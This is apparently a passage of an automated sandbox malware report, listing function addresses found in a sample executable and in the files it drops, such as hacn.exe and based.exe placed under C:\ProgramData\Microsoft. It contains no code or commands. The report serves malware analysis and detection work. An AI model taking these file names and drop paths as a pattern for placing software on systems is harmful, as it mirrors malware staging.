                                  Source: C:\Users\user\Desktop\VaTlw2kNGc.exeCode function: 0_2_00007FF7691BCD6C0_2_00007FF7691BCD6C
                                  Source: C:\Users\user\Desktop\VaTlw2kNGc.exeCode function: 0_2_00007FF7691A95FB0_2_00007FF7691A95FB
                                  Source: C:\Users\user\Desktop\VaTlw2kNGc.exeCode function: 0_2_00007FF7691B50400_2_00007FF7691B5040
                                  Source: C:\Users\user\Desktop\VaTlw2kNGc.exeCode function: 0_2_00007FF7691BD8800_2_00007FF7691BD880
                                  Source: C:\Users\user\Desktop\VaTlw2kNGc.exeCode function: 0_2_00007FF7691B10740_2_00007FF7691B1074
                                  Source: C:\Users\user\Desktop\VaTlw2kNGc.exeCode function: 0_2_00007FF7691B28C00_2_00007FF7691B28C0
                                  Source: C:\Users\user\Desktop\VaTlw2kNGc.exeCode function: 0_2_00007FF7691C2F200_2_00007FF7691C2F20
                                  Source: C:\Users\user\Desktop\VaTlw2kNGc.exeCode function: 0_2_00007FF7691BFBD80_2_00007FF7691BFBD8
                                  Source: C:\Users\user\Desktop\VaTlw2kNGc.exeCode function: 0_2_00007FF7691B1F300_2_00007FF7691B1F30
                                  Source: C:\Users\user\Desktop\VaTlw2kNGc.exeCode function: 0_2_00007FF7691C57280_2_00007FF7691C5728
                                  Source: C:\Users\user\Desktop\VaTlw2kNGc.exeCode function: 0_2_00007FF7691A9FCD0_2_00007FF7691A9FCD
                                  Source: C:\Users\user\Desktop\VaTlw2kNGc.exeCode function: 0_2_00007FF7691A979B0_2_00007FF7691A979B
                                  Source: C:\Users\user\Desktop\VaTlw2kNGc.exeCode function: 1_2_00007FF7691C5C741_2_00007FF7691C5C74
                                  Source: C:\Users\user\Desktop\VaTlw2kNGc.exeCode function: 1_2_00007FF7691A95FB1_2_00007FF7691A95FB
                                  Source: C:\Users\user\Desktop\VaTlw2kNGc.exeCode function: 1_2_00007FF7691A10001_2_00007FF7691A1000
                                  Source: C:\Users\user\Desktop\VaTlw2kNGc.exeCode function: 1_2_00007FF7691C8A381_2_00007FF7691C8A38
                                  Source: C:\Users\user\Desktop\VaTlw2kNGc.exeCode function: 1_2_00007FF7691B12801_2_00007FF7691B1280
                                  Source: C:\Users\user\Desktop\VaTlw2kNGc.exeCode function: 1_2_00007FF7691B0A601_2_00007FF7691B0A60
                                  Source: C:\Users\user\Desktop\VaTlw2kNGc.exeCode function: 1_2_00007FF7691B7AAC1_2_00007FF7691B7AAC
                                  Source: C:\Users\user\Desktop\VaTlw2kNGc.exeCode function: 1_2_00007FF7691C518C1_2_00007FF7691C518C
                                  Source: C:\Users\user\Desktop\VaTlw2kNGc.exeCode function: 1_2_00007FF7691B91B01_2_00007FF7691B91B0
                                  Source: C:\Users\user\Desktop\VaTlw2kNGc.exeCode function: 1_2_00007FF7691BD2001_2_00007FF7691BD200
                                  Source: C:\Users\user\Desktop\VaTlw2kNGc.exeCode function: 1_2_00007FF7691B14841_2_00007FF7691B1484
                                  Source: C:\Users\user\Desktop\VaTlw2kNGc.exeCode function: 1_2_00007FF7691B0C641_2_00007FF7691B0C64
                                  Source: C:\Users\user\Desktop\VaTlw2kNGc.exeCode function: 1_2_00007FF7691B2CC41_2_00007FF7691B2CC4
                                  Source: C:\Users\user\Desktop\VaTlw2kNGc.exeCode function: 1_2_00007FF7691A8B201_2_00007FF7691A8B20
                                  Source: C:\Users\user\Desktop\VaTlw2kNGc.exeCode function: 1_2_00007FF7691C0B841_2_00007FF7691C0B84
                                  Source: C:\Users\user\Desktop\VaTlw2kNGc.exeCode function: 1_2_00007FF7691C33BC1_2_00007FF7691C33BC
                                  Source: C:\Users\user\Desktop\VaTlw2kNGc.exeCode function: 1_2_00007FF7691BFBD81_2_00007FF7691BFBD8
                                  Source: C:\Users\user\Desktop\VaTlw2kNGc.exeCode function: 1_2_00007FF7691B73F41_2_00007FF7691B73F4
                                  Source: C:\Users\user\Desktop\VaTlw2kNGc.exeCode function: 1_2_00007FF7691B0E701_2_00007FF7691B0E70
                                  Source: C:\Users\user\Desktop\VaTlw2kNGc.exeCode function: 1_2_00007FF7691C4F101_2_00007FF7691C4F10
                                  Source: C:\Users\user\Desktop\VaTlw2kNGc.exeCode function: 1_2_00007FF7691BCD6C1_2_00007FF7691BCD6C
                                  Source: C:\Users\user\Desktop\VaTlw2kNGc.exeCode function: 1_2_00007FF7691B50401_2_00007FF7691B5040
                                  Source: C:\Users\user\Desktop\VaTlw2kNGc.exeCode function: 1_2_00007FF7691BD8801_2_00007FF7691BD880
                                  Source: C:\Users\user\Desktop\VaTlw2kNGc.exeCode function: 1_2_00007FF7691B10741_2_00007FF7691B1074
                                  Source: C:\Users\user\Desktop\VaTlw2kNGc.exeCode function: 1_2_00007FF7691B28C01_2_00007FF7691B28C0
                                  Source: C:\Users\user\Desktop\VaTlw2kNGc.exeCode function: 1_2_00007FF7691C2F201_2_00007FF7691C2F20
                                  Source: C:\Users\user\Desktop\VaTlw2kNGc.exeCode function: 1_2_00007FF7691BFBD81_2_00007FF7691BFBD8
                                  Source: C:\Users\user\Desktop\VaTlw2kNGc.exeCode function: 1_2_00007FF7691B1F301_2_00007FF7691B1F30
                                  Source: C:\Users\user\Desktop\VaTlw2kNGc.exeCode function: 1_2_00007FF7691C57281_2_00007FF7691C5728
                                  Source: C:\Users\user\Desktop\VaTlw2kNGc.exeCode function: 1_2_00007FF7691A9FCD1_2_00007FF7691A9FCD
                                  Source: C:\Users\user\Desktop\VaTlw2kNGc.exeCode function: 1_2_00007FF7691A979B1_2_00007FF7691A979B
                                  Source: C:\Users\user\Desktop\VaTlw2kNGc.exeCode function: 1_2_00007FFE133075081_2_00007FFE13307508
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI69202\Build.exeCode function: 4_2_009299064_2_00929906
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI69202\Build.exeCode function: 4_2_0092F9634_2_0092F963
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI69202\Build.exeCode function: 4_2_0093EA074_2_0093EA07
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI69202\Build.exeCode function: 4_2_00938C7E4_2_00938C7E
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI69202\Build.exeCode function: 4_2_009360F74_2_009360F7
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI69202\Build.exeCode function: 4_2_009540444_2_00954044
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI69202\Build.exeCode function: 4_2_009391114_2_00939111
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI69202\Build.exeCode function: 4_2_009321254_2_00932125
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI69202\Build.exeCode function: 4_2_009382D04_2_009382D0
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI69202\Build.exeCode function: 4_2_0092E3944_2_0092E394
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI69202\Build.exeCode function: 4_2_009364454_2_00936445
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI69202\Build.exeCode function: 4_2_009314764_2_00931476
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI69202\Build.exeCode function: 4_2_009477384_2_00947738
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI69202\Build.exeCode function: 4_2_0093976F4_2_0093976F
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI69202\Build.exeCode function: 4_2_009309494_2_00930949
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI69202\Build.exeCode function: 4_2_009479674_2_00947967
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI69202\Build.exeCode function: 4_2_0094FA904_2_0094FA90
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI69202\Build.exeCode function: 4_2_00923AB74_2_00923AB7
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI69202\Build.exeCode function: 4_2_00924C6E4_2_00924C6E
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI69202\Build.exeCode function: 4_2_00935E864_2_00935E86
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI69202\Build.exeCode function: 4_2_00930FAC4_2_00930FAC
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI69202\Build.exeCode function: 4_2_00922FCB4_2_00922FCB
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI69202\Build.exeCode function: 4_2_0094FF3E4_2_0094FF3E
                                  Source: C:\ProgramData\Microsoft\hacn.exeCode function: 5_2_00007FF6929973BC5_2_00007FF6929973BC
                                  Source: C:\ProgramData\Microsoft\hacn.exeCode function: 5_2_00007FF6929964705_2_00007FF692996470
                                  Source: C:\ProgramData\Microsoft\hacn.exeCode function: 5_2_00007FF6929779605_2_00007FF692977960
                                  Source: C:\ProgramData\Microsoft\hacn.exeCode function: 5_2_00007FF692987F4C5_2_00007FF692987F4C
                                  Source: C:\ProgramData\Microsoft\hacn.exeCode function: 5_2_00007FF692983BE45_2_00007FF692983BE4
                                  Source: C:\ProgramData\Microsoft\hacn.exeCode function: 5_2_00007FF69298EC305_2_00007FF69298EC30
                                  Source: C:\ProgramData\Microsoft\hacn.exeCode function: 5_2_00007FF6929823A45_2_00007FF6929823A4
                                  Source: C:\ProgramData\Microsoft\hacn.exeCode function: 5_2_00007FF6929943805_2_00007FF692994380
                                  Source: C:\ProgramData\Microsoft\hacn.exeCode function: 5_2_00007FF692981B845_2_00007FF692981B84
                                  Source: C:\ProgramData\Microsoft\hacn.exeCode function: 5_2_00007FF6929910385_2_00007FF692991038
                                  Source: C:\ProgramData\Microsoft\hacn.exeCode function: 5_2_00007FF69298A5305_2_00007FF69298A530
                                  Source: C:\ProgramData\Microsoft\hacn.exeCode function: 5_2_00007FF6929821A05_2_00007FF6929821A0
                                  Source: C:\ProgramData\Microsoft\hacn.exeCode function: 5_2_00007FF6929819805_2_00007FF692981980
                                  Source: C:\ProgramData\Microsoft\hacn.exeCode function: 5_2_00007FF692991FE45_2_00007FF692991FE4
                                  Source: C:\ProgramData\Microsoft\hacn.exeCode function: 5_2_00007FF6929837E05_2_00007FF6929837E0
                                  Source: C:\ProgramData\Microsoft\hacn.exeCode function: 5_2_00007FF6929887D05_2_00007FF6929887D0
                                  Source: C:\ProgramData\Microsoft\hacn.exeCode function: 5_2_00007FF69299481C5_2_00007FF69299481C
                                  Source: C:\ProgramData\Microsoft\hacn.exeCode function: 5_2_00007FF6929860305_2_00007FF692986030
                                  Source: C:\ProgramData\Microsoft\hacn.exeCode function: 5_2_00007FF692971F505_2_00007FF692971F50
                                  Source: C:\ProgramData\Microsoft\hacn.exeCode function: 5_2_00007FF692981F945_2_00007FF692981F94
                                  Source: C:\ProgramData\Microsoft\hacn.exeCode function: 5_2_00007FF6929790D05_2_00007FF6929790D0
                                  Source: C:\ProgramData\Microsoft\hacn.exeCode function: 5_2_00007FF69298E11C5_2_00007FF69298E11C
                                  Source: C:\ProgramData\Microsoft\hacn.exeCode function: 5_2_00007FF69299A0F85_2_00007FF69299A0F8
                                  Source: C:\ProgramData\Microsoft\hacn.exeCode function: 5_2_00007FF6929910385_2_00007FF692991038
                                  Source: C:\ProgramData\Microsoft\hacn.exeCode function: 5_2_00007FF692987F4C5_2_00007FF692987F4C
                                  Source: C:\ProgramData\Microsoft\hacn.exeCode function: 5_2_00007FF692987D985_2_00007FF692987D98
                                  Source: C:\ProgramData\Microsoft\hacn.exeCode function: 5_2_00007FF69298E5B05_2_00007FF69298E5B0
                                  Source: C:\ProgramData\Microsoft\hacn.exeCode function: 5_2_00007FF692981D905_2_00007FF692981D90
                                  Source: C:\ProgramData\Microsoft\hacn.exeCode function: 5_2_00007FF6929966EC5_2_00007FF6929966EC
                                  Source: C:\ProgramData\Microsoft\hacn.exeCode function: 5_2_00007FF692996E705_2_00007FF692996E70
                                  Source: C:\ProgramData\Microsoft\hacn.exeCode function: 5_2_00007FF692982E505_2_00007FF692982E50
                                  Source: C:\ProgramData\Microsoft\based.exeCode function: 6_2_00000202B6E038A86_2_00000202B6E038A8
                                  Source: C:\ProgramData\Microsoft\based.exeCode function: 6_2_00000202B6DFD0E06_2_00000202B6DFD0E0
                                  Source: C:\ProgramData\Microsoft\based.exeCode function: 6_2_00000202B6DF1F2C6_2_00000202B6DF1F2C
                                  Source: C:\ProgramData\Microsoft\based.exeCode function: 6_2_00000202B6E22B2C6_2_00000202B6E22B2C
                                  Source: C:\ProgramData\Microsoft\based.exeCode function: 6_2_00000202B6E344A86_2_00000202B6E344A8
                                  Source: C:\ProgramData\Microsoft\based.exeCode function: 6_2_00000202B6E2DCE06_2_00000202B6E2DCE0
                                  Source: C:\ProgramData\Microsoft\based.exeCode function: 6_2_00000202B6E638A86_2_00000202B6E638A8
                                  Source: C:\ProgramData\Microsoft\based.exeCode function: 6_2_00000202B6E5D0E06_2_00000202B6E5D0E0
                                  Source: C:\ProgramData\Microsoft\based.exeCode function: 6_2_00000202B6E51F2C6_2_00000202B6E51F2C
                                  Source: C:\ProgramData\Microsoft\based.exeCode function: 6_2_00007FF7D1565C746_2_00007FF7D1565C74
                                  Source: C:\ProgramData\Microsoft\based.exeCode function: 6_2_00007FF7D155FBD86_2_00007FF7D155FBD8
                                  Source: C:\ProgramData\Microsoft\based.exeCode function: 6_2_00007FF7D15410006_2_00007FF7D1541000
                                  Source: C:\ProgramData\Microsoft\based.exeCode function: 6_2_00007FF7D15512806_2_00007FF7D1551280
                                  Source: C:\ProgramData\Microsoft\based.exeCode function: 6_2_00007FF7D1550A606_2_00007FF7D1550A60
                                  Source: C:\ProgramData\Microsoft\based.exeCode function: 6_2_00007FF7D1568A386_2_00007FF7D1568A38
                                  Source: C:\ProgramData\Microsoft\based.exeCode function: 6_2_00007FF7D1557AAC6_2_00007FF7D1557AAC
                                  Source: C:\ProgramData\Microsoft\based.exeCode function: 6_2_00007FF7D156518C6_2_00007FF7D156518C
                                  Source: C:\ProgramData\Microsoft\based.exeCode function: 6_2_00007FF7D155D2006_2_00007FF7D155D200
                                  Source: C:\ProgramData\Microsoft\based.exeCode function: 6_2_00007FF7D15591B06_2_00007FF7D15591B0
                                  Source: C:\ProgramData\Microsoft\based.exeCode function: 6_2_00007FF7D15514846_2_00007FF7D1551484
                                  Source: C:\ProgramData\Microsoft\based.exeCode function: 6_2_00007FF7D1550C646_2_00007FF7D1550C64
                                  Source: C:\ProgramData\Microsoft\based.exeCode function: 6_2_00007FF7D1552CC46_2_00007FF7D1552CC4
                                  Source: C:\ProgramData\Microsoft\based.exeCode function: 6_2_00007FF7D1560B846_2_00007FF7D1560B84
                                  Source: C:\ProgramData\Microsoft\based.exeCode function: 6_2_00007FF7D1548B206_2_00007FF7D1548B20
                                  Source: C:\ProgramData\Microsoft\based.exeCode function: 6_2_00007FF7D15573F46_2_00007FF7D15573F4
                                  Source: C:\ProgramData\Microsoft\based.exeCode function: 6_2_00007FF7D15633BC6_2_00007FF7D15633BC
                                  Source: C:\ProgramData\Microsoft\based.exeCode function: 6_2_00007FF7D1550E706_2_00007FF7D1550E70
                                  Source: C:\ProgramData\Microsoft\based.exeCode function: 6_2_00007FF7D1564F106_2_00007FF7D1564F10
                                  Source: C:\ProgramData\Microsoft\based.exeCode function: 6_2_00007FF7D155CD6C6_2_00007FF7D155CD6C
                                  Source: C:\ProgramData\Microsoft\based.exeCode function: 6_2_00007FF7D15495FB6_2_00007FF7D15495FB
                                  Source: C:\ProgramData\Microsoft\based.exeCode function: 6_2_00007FF7D155D8806_2_00007FF7D155D880
                                  Source: C:\ProgramData\Microsoft\based.exeCode function: 6_2_00007FF7D15510746_2_00007FF7D1551074
                                  Source: C:\ProgramData\Microsoft\based.exeCode function: 6_2_00007FF7D15550406_2_00007FF7D1555040
                                  Source: C:\ProgramData\Microsoft\based.exeCode function: 6_2_00007FF7D15528C06_2_00007FF7D15528C0
                                  Source: C:\ProgramData\Microsoft\based.exeCode function: 6_2_00007FF7D1562F206_2_00007FF7D1562F20
                                  Source: C:\ProgramData\Microsoft\based.exeCode function: 6_2_00007FF7D15657286_2_00007FF7D1565728
                                  Source: C:\ProgramData\Microsoft\based.exeCode function: 6_2_00007FF7D155FBD86_2_00007FF7D155FBD8
                                  Source: C:\ProgramData\Microsoft\based.exeCode function: 6_2_00007FF7D1551F306_2_00007FF7D1551F30
                                  Source: C:\ProgramData\Microsoft\based.exeCode function: 6_2_00007FF7D1549FCD6_2_00007FF7D1549FCD
                                  Source: C:\ProgramData\Microsoft\based.exeCode function: 6_2_00007FF7D154979B6_2_00007FF7D154979B
                                  Source: C:\ProgramData\Microsoft\based.exeCode function: 8_2_00000273EE611F2C8_2_00000273EE611F2C
                                  Source: C:\ProgramData\Microsoft\based.exeCode function: 8_2_00000273EE61D0E08_2_00000273EE61D0E0
                                  Source: C:\ProgramData\Microsoft\based.exeCode function: 8_2_00000273EE6238A88_2_00000273EE6238A8
                                  Source: C:\ProgramData\Microsoft\based.exeCode function: 8_2_00000273EE642B2C8_2_00000273EE642B2C
                                  Source: C:\ProgramData\Microsoft\based.exeCode function: 8_2_00000273EE64DCE08_2_00000273EE64DCE0
                                  Source: C:\ProgramData\Microsoft\based.exeCode function: 8_2_00000273EE6544A88_2_00000273EE6544A8
                                  Source: C:\ProgramData\Microsoft\based.exeCode function: 8_2_00000273EE671F2C8_2_00000273EE671F2C
                                  Source: C:\ProgramData\Microsoft\based.exeCode function: 8_2_00000273EE67D0E08_2_00000273EE67D0E0
                                  Source: C:\ProgramData\Microsoft\based.exeCode function: 8_2_00000273EE6838A88_2_00000273EE6838A8
                                  Source: C:\ProgramData\Microsoft\based.exeCode function: 8_2_00007FF7D1565C748_2_00007FF7D1565C74
                                  Source: C:\ProgramData\Microsoft\based.exeCode function: 8_2_00007FF7D15495FB8_2_00007FF7D15495FB
                                  Source: C:\ProgramData\Microsoft\based.exeCode function: 8_2_00007FF7D15410008_2_00007FF7D1541000
                                  Source: C:\ProgramData\Microsoft\based.exeCode function: 8_2_00007FF7D15512808_2_00007FF7D1551280
                                  Source: C:\ProgramData\Microsoft\based.exeCode function: 8_2_00007FF7D1550A608_2_00007FF7D1550A60
                                  Source: C:\ProgramData\Microsoft\based.exeCode function: 8_2_00007FF7D1568A388_2_00007FF7D1568A38
                                  Source: C:\ProgramData\Microsoft\based.exeCode function: 8_2_00007FF7D1557AAC8_2_00007FF7D1557AAC
                                  Source: C:\ProgramData\Microsoft\based.exeCode function: 8_2_00007FF7D156518C8_2_00007FF7D156518C
                                  Source: C:\ProgramData\Microsoft\based.exeCode function: 8_2_00007FF7D155D2008_2_00007FF7D155D200
                                  Source: C:\ProgramData\Microsoft\based.exeCode function: 8_2_00007FF7D15591B08_2_00007FF7D15591B0
                                  Source: C:\ProgramData\Microsoft\based.exeCode function: 8_2_00007FF7D15514848_2_00007FF7D1551484
                                  Source: C:\ProgramData\Microsoft\based.exeCode function: 8_2_00007FF7D1550C648_2_00007FF7D1550C64
                                  Source: C:\ProgramData\Microsoft\based.exeCode function: 8_2_00007FF7D1552CC48_2_00007FF7D1552CC4
                                  Source: C:\ProgramData\Microsoft\based.exeCode function: 8_2_00007FF7D1560B848_2_00007FF7D1560B84
                                  Source: C:\ProgramData\Microsoft\based.exeCode function: 8_2_00007FF7D1548B208_2_00007FF7D1548B20
                                  Source: C:\ProgramData\Microsoft\based.exeCode function: 8_2_00007FF7D155FBD88_2_00007FF7D155FBD8
                                  Source: C:\ProgramData\Microsoft\based.exeCode function: 8_2_00007FF7D15573F48_2_00007FF7D15573F4
                                  Source: C:\ProgramData\Microsoft\based.exeCode function: 8_2_00007FF7D15633BC8_2_00007FF7D15633BC
                                  Source: C:\ProgramData\Microsoft\based.exeCode function: 8_2_00007FF7D1550E708_2_00007FF7D1550E70
                                  Source: C:\ProgramData\Microsoft\based.exeCode function: 8_2_00007FF7D1564F108_2_00007FF7D1564F10
                                  Source: C:\ProgramData\Microsoft\based.exeCode function: 8_2_00007FF7D155CD6C8_2_00007FF7D155CD6C
                                  Source: C:\ProgramData\Microsoft\based.exeCode function: 8_2_00007FF7D155D8808_2_00007FF7D155D880
                                  Source: C:\ProgramData\Microsoft\based.exeCode function: 8_2_00007FF7D15510748_2_00007FF7D1551074
                                  Source: C:\ProgramData\Microsoft\based.exeCode function: 8_2_00007FF7D15550408_2_00007FF7D1555040
                                  Source: C:\ProgramData\Microsoft\based.exeCode function: 8_2_00007FF7D15528C08_2_00007FF7D15528C0
                                  Source: C:\ProgramData\Microsoft\based.exeCode function: 8_2_00007FF7D1562F208_2_00007FF7D1562F20
                                  Source: C:\ProgramData\Microsoft\based.exeCode function: 8_2_00007FF7D15657288_2_00007FF7D1565728
                                  Source: C:\ProgramData\Microsoft\based.exeCode function: 8_2_00007FF7D155FBD88_2_00007FF7D155FBD8
                                  Source: C:\ProgramData\Microsoft\based.exeCode function: 8_2_00007FF7D1551F308_2_00007FF7D1551F30
                                  Source: C:\ProgramData\Microsoft\based.exeCode function: 8_2_00007FF7D1549FCD8_2_00007FF7D1549FCD
                                  Source: C:\ProgramData\Microsoft\based.exeCode function: 8_2_00007FF7D154979B8_2_00007FF7D154979B
                                  Source: C:\ProgramData\Microsoft\based.exeCode function: 8_2_00007FFDFB4358A08_2_00007FFDFB4358A0
                                  Source: C:\ProgramData\Microsoft\based.exeCode function: 8_2_00007FFDFB5718D08_2_00007FFDFB5718D0
                                  Source: C:\ProgramData\Microsoft\based.exeCode function: 8_2_00007FFDFB5712F08_2_00007FFDFB5712F0
                                  Source: C:\ProgramData\Microsoft\based.exeCode function: 8_2_00007FFDFB69B3708_2_00007FFDFB69B370
                                  Source: C:\ProgramData\Microsoft\based.exeCode function: 8_2_00007FFDFB6F7B908_2_00007FFDFB6F7B90
                                  Source: C:\ProgramData\Microsoft\based.exeCode function: 8_2_00007FFDFB6DFC008_2_00007FFDFB6DFC00
                                  Source: C:\ProgramData\Microsoft\based.exeCode function: 8_2_00007FFDFB6914518_2_00007FFDFB691451
                                  Source: C:\ProgramData\Microsoft\based.exeCode function: 8_2_00007FFDFB69F8B58_2_00007FFDFB69F8B5
                                  Source: C:\ProgramData\Microsoft\based.exeCode function: 8_2_00007FFDFB6919568_2_00007FFDFB691956
                                  Source: C:\ProgramData\Microsoft\based.exeCode function: 8_2_00007FFDFB691DCF8_2_00007FFDFB691DCF
                                  Source: C:\ProgramData\Microsoft\based.exeCode function: 8_2_00007FFDFB6919978_2_00007FFDFB691997
                                  Source: C:\ProgramData\Microsoft\based.exeCode function: 8_2_00007FFDFB6913988_2_00007FFDFB691398
                                  Source: C:\ProgramData\Microsoft\based.exeCode function: 8_2_00007FFDFB6A11A08_2_00007FFDFB6A11A0
                                  Source: C:\ProgramData\Microsoft\based.exeCode function: 8_2_00007FFDFB691A878_2_00007FFDFB691A87
                                  Source: C:\ProgramData\Microsoft\based.exeCode function: 8_2_00007FFDFB691C948_2_00007FFDFB691C94
                                  Source: C:\ProgramData\Microsoft\based.exeCode function: 8_2_00007FFDFB69114F8_2_00007FFDFB69114F
                                  Source: C:\ProgramData\Microsoft\based.exeCode function: 8_2_00007FFDFB6913F28_2_00007FFDFB6913F2
                                  Source: C:\ProgramData\Microsoft\based.exeCode function: 8_2_00007FFDFB696BA08_2_00007FFDFB696BA0
                                  Source: C:\ProgramData\Microsoft\based.exeCode function: 8_2_00007FFDFB6915378_2_00007FFDFB691537
                                  Source: C:\ProgramData\Microsoft\based.exeCode function: 8_2_00007FFDFB6F09508_2_00007FFDFB6F0950
                                  Source: C:\ProgramData\Microsoft\based.exeCode function: 8_2_00007FFDFB69115E8_2_00007FFDFB69115E
                                  Source: C:\ProgramData\Microsoft\based.exeCode function: 8_2_00007FFDFB6915B48_2_00007FFDFB6915B4
                                  Source: C:\ProgramData\Microsoft\based.exeCode function: 8_2_00007FFDFB69168B8_2_00007FFDFB69168B
                                  Source: C:\ProgramData\Microsoft\based.exeCode function: 8_2_00007FFDFB69256D8_2_00007FFDFB69256D
                                  Source: C:\ProgramData\Microsoft\based.exeCode function: 8_2_00007FFDFB6F02508_2_00007FFDFB6F0250
                                  Source: C:\ProgramData\Microsoft\based.exeCode function: 8_2_00007FFDFB691BDB8_2_00007FFDFB691BDB
                                  Source: C:\ProgramData\Microsoft\based.exeCode function: 8_2_00007FFDFB6920AE8_2_00007FFDFB6920AE
                                  Source: C:\ProgramData\Microsoft\based.exeCode function: 8_2_00007FFDFB7407408_2_00007FFDFB740740
                                  Source: C:\ProgramData\Microsoft\based.exeCode function: 8_2_00007FFDFBAA44608_2_00007FFDFBAA4460
                                  Source: C:\ProgramData\Microsoft\based.exeCode function: 8_2_00007FFDFB8F3B808_2_00007FFDFB8F3B80
                                  Source: C:\ProgramData\Microsoft\based.exeCode function: 8_2_00007FFDFB907BC08_2_00007FFDFB907BC0
                                  Source: C:\ProgramData\Microsoft\based.exeCode function: 8_2_00007FFDFB756A878_2_00007FFDFB756A87
                                  Source: C:\ProgramData\Microsoft\based.exeCode function: 8_2_00007FFDFB75655F8_2_00007FFDFB75655F
                                  Source: C:\ProgramData\Microsoft\based.exeCode function: 8_2_00007FFDFB7BFA008_2_00007FFDFB7BFA00
                                  Source: C:\ProgramData\Microsoft\based.exeCode function: 8_2_00007FFDFB7541658_2_00007FFDFB754165
                                  Source: C:\ProgramData\Microsoft\based.exeCode function: 8_2_00007FFDFB753FDA8_2_00007FFDFB753FDA
                                  Source: C:\ProgramData\Microsoft\based.exeCode function: 8_2_00007FFDFB7560A08_2_00007FFDFB7560A0
                                  Source: C:\ProgramData\Microsoft\based.exeCode function: 8_2_00007FFDFB7522E88_2_00007FFDFB7522E8
                                  Source: C:\ProgramData\Microsoft\based.exeCode function: 8_2_00007FFDFB7521B78_2_00007FFDFB7521B7
                                  Source: C:\ProgramData\Microsoft\based.exeCode function: 8_2_00007FFDFB8800108_2_00007FFDFB880010
                                  Source: C:\ProgramData\Microsoft\based.exeCode function: 8_2_00007FFDFB7527668_2_00007FFDFB752766
                                  Source: C:\ProgramData\Microsoft\based.exeCode function: 8_2_00007FFDFB76BF208_2_00007FFDFB76BF20
                                  Source: C:\ProgramData\Microsoft\based.exeCode function: 8_2_00007FFDFB7522898_2_00007FFDFB752289
                                  Source: C:\ProgramData\Microsoft\based.exeCode function: 8_2_00007FFDFB7532E78_2_00007FFDFB7532E7
                                  Source: C:\ProgramData\Microsoft\based.exeCode function: 8_2_00007FFDFB76BD608_2_00007FFDFB76BD60
                                  Source: C:\ProgramData\Microsoft\based.exeCode function: 8_2_00007FFDFB7530C18_2_00007FFDFB7530C1
                                  Source: C:\ProgramData\Microsoft\based.exeCode function: 8_2_00007FFDFB887CD08_2_00007FFDFB887CD0
                                  Source: C:\ProgramData\Microsoft\based.exeCode function: 8_2_00007FFDFB755D8A8_2_00007FFDFB755D8A
                                  Source: C:\ProgramData\Microsoft\based.exeCode function: 8_2_00007FFDFB756EF18_2_00007FFDFB756EF1
                                  Source: C:\ProgramData\Microsoft\based.exeCode function: 8_2_00007FFDFB756CBC8_2_00007FFDFB756CBC
                                  Source: C:\ProgramData\Microsoft\based.exeCode function: 8_2_00007FFDFB7529CD8_2_00007FFDFB7529CD
                                  Source: C:\ProgramData\Microsoft\based.exeCode function: 8_2_00007FFDFB76F2008_2_00007FFDFB76F200
                                  Source: C:\ProgramData\Microsoft\based.exeCode function: 8_2_00007FFDFB88B2008_2_00007FFDFB88B200
                                  Source: C:\ProgramData\Microsoft\based.exeCode function: 8_2_00007FFDFB75114F8_2_00007FFDFB75114F
                                  Source: C:\ProgramData\Microsoft\based.exeCode function: 8_2_00007FFDFB76F0608_2_00007FFDFB76F060
                                  Source: C:\ProgramData\Microsoft\based.exeCode function: 8_2_00007FFDFB75213F8_2_00007FFDFB75213F
                                  Source: C:\ProgramData\Microsoft\based.exeCode function: 8_2_00007FFDFB751EA18_2_00007FFDFB751EA1
                                  Source: C:\ProgramData\Microsoft\based.exeCode function: 8_2_00007FFDFB756F288_2_00007FFDFB756F28
                                  Source: C:\ProgramData\Microsoft\based.exeCode function: 8_2_00007FFDFB77B8508_2_00007FFDFB77B850
                                  Source: C:\ProgramData\Microsoft\based.exeCode function: 8_2_00007FFDFB75704A8_2_00007FFDFB75704A
                                  Source: C:\ProgramData\Microsoft\based.exeCode function: 8_2_00007FFDFB98F7D08_2_00007FFDFB98F7D0
                                  Source: C:\ProgramData\Microsoft\based.exeCode function: 8_2_00007FFDFB8874F08_2_00007FFDFB8874F0
                                  Source: C:\ProgramData\Microsoft\based.exeCode function: 8_2_00007FFDFB7551698_2_00007FFDFB755169
                                  Source: C:\ProgramData\Microsoft\based.exeCode function: 8_2_00007FFDFB753B938_2_00007FFDFB753B93
                                  Source: C:\ProgramData\Microsoft\based.exeCode function: 8_2_00007FFDFB77B4C08_2_00007FFDFB77B4C0
                                  Source: C:\ProgramData\Microsoft\based.exeCode function: 8_2_00007FFDFB8F2C408_2_00007FFDFB8F2C40
                                  Source: C:\ProgramData\Microsoft\based.exeCode function: 8_2_00007FFDFB755E258_2_00007FFDFB755E25
                                  Source: C:\ProgramData\Microsoft\based.exeCode function: 8_2_00007FFDFB754E4E8_2_00007FFDFB754E4E
                                  Source: C:\ProgramData\Microsoft\based.exeCode function: 8_2_00007FFDFB7560DC8_2_00007FFDFB7560DC
                                  Source: C:\ProgramData\Microsoft\based.exeCode function: 8_2_00007FFDFB7523F18_2_00007FFDFB7523F1
                                  Source: C:\ProgramData\Microsoft\based.exeCode function: 8_2_00007FFDFB8DE8708_2_00007FFDFB8DE870
                                  Source: C:\ProgramData\Microsoft\based.exeCode function: 8_2_00007FFDFB7572C58_2_00007FFDFB7572C5
                                  Source: C:\ProgramData\Microsoft\based.exeCode function: 8_2_00007FFDFB7546338_2_00007FFDFB754633
